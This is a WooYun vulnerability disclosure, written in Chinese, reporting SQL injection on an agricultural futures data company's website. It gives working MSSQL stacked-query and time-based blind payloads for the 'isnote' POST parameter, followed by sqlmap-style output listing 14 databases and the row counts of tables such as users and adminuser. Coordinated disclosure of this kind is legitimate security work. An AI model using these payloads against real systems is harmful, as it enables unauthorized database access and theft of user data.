漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0161595
漏洞标题:布瑞克·农产品期货网全网数据沦陷#上万张表数据测漏
相关厂商:布瑞克环球(北京)农业有限公司
漏洞作者: 路人甲
提交时间:2015-12-20 17:08
修复时间:2016-02-01 17:24
公开时间:2016-02-01 17:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-20: 细节已通知厂商并且等待厂商处理中
2015-12-24: 厂商已经确认,细节仅向厂商公开
2016-01-03: 细节向核心白帽子及相关领域专家公开
2016-01-13: 细节向普通白帽子公开
2016-01-23: 细节向实习白帽子公开
2016-02-01: 细节向公众公开
简要描述:
布瑞克·农产品期货网全网数据沦陷#上万张表数据测漏
详细说明:
http://**.**.**.**/ZChart?classid=1&byclass=true&index=true
漏洞证明:
http://**.**.**.**/ZChart?classid=1&byclass=true&index=true
数据很多。。延迟。。的就不深入了。数据很大。还是是全球级别的公司
Place: POST
Parameter: isnote
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: count=88952634&cperson=88952634&ctel=88952634&isnote=1'); WAITFOR DELAY '0:0:5'--&cname=88952634
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: count=88952634&cperson=88952634&ctel=88952634&isnote=1') WAITFOR DELAY '0:0:5'--&cname=88952634
---
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (1727=1727&byclass=true&index=true
---
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
available databases [14]:
[*] accfutures
[*] backup
[*] bricdata
[*] BricServer
[*] ccanc
[*] diaoyan
[*] jhjl
[*] master
[*] model
[*] msdb
[*] ReportServer$SQLEXPRESS
[*] ReportServer$SQLEXPRESSTempDB
[*] tempdb
[*] test
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: accfutures
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.readHistory | 299876 |
| dbo.news | 283815 |
| dbo.pricerecord | 260190 |
| dbo.mychart | 227888 |
| dbo.uploadDownloadLog | 35107 |
| dbo.DEPARTMENT | 29881 |
| dbo.user_vip | 19129 |
| dbo.bookmark | 18532 |
| dbo.priceOperateLog | 13705 |
| dbo.upload | 12356 |
| dbo.temp20150317 | 10569 |
| dbo.users | 9521 |
| dbo.testtab | 5601 |
| dbo.GongGao | 5593 |
| dbo.saftnews | 3502 |
| dbo.COLLEGE | 3093 |
| dbo.blogVisitor | 2896 |
| dbo.feed | 2401 |
| dbo.TangDanWei | 1829 |
| dbo.user_infor | 1507 |
| dbo.cyorder | 1477 |
| dbo.crecord | 1274 |
| dbo.crecord_bak_20151207 | 1249 |
| dbo.priceStatisticsLog | 1196 |
| dbo.backtopic | 1086 |
| dbo.article | 1030 |
| dbo.corder_news | 993 |
| dbo.cytopic | 846 |
| dbo.CRW_Microbell_EXPT_URL | 817 |
| dbo.user_tgroup | 689 |
| dbo.guanzhu | 609 |
| dbo.friend | 516 |
| dbo.guestbook | 397 |
| dbo.img | 394 |
| **.**.**.**ment | 294 |
| dbo.usersrelevance | 267 |
| dbo.acity | 260 |
| dbo.helpMenu | 235 |
| dbo.photo | 197 |
| dbo.usergroup | 178 |
| dbo.info | 176 |
| dbo.helpcontent | 172 |
| dbo.gfsfnews | 128 |
| dbo.level | 84 |
| dbo.quotation | 66 |
| dbo.dusers | 61 |
| dbo.texiao | 59 |
| dbo.OrderRelationship | 56 |
| dbo.fangtan | 55 |
| dbo.saftclass | 55 |
| dbo.album | 50 |
| dbo.adminuser | 49 |
| dbo.enews | 49 |
| dbo.newsclass | 44 |
| dbo.myactive | 42 |
| dbo.province | 34 |
| dbo.topicgroup | 31 |
| **.**.**.**pany | 30 |
| dbo.areas | 29 |
| dbo.subject | 29 |
| dbo.allhy | 22 |
| dbo.smallclass | 22 |
| dbo.takemoney | 21 |
| dbo.jbzlclass | 16 |
| dbo.todaycommend | 12 |
| dbo.enpicture | 8 |
| dbo.sques | 8 |
| dbo.areaprice | 7 |
| dbo.corder | 7 |
| dbo.privilege | 4 |
| dbo.bigclass | 3 |
| dbo.eclass | 2 |
| dbo.saftyimage | 1 |
| dbo.temp | 1 |
+----------------------------+---------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-12-24 18:05
厂商回复:
CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
最新状态:
暂无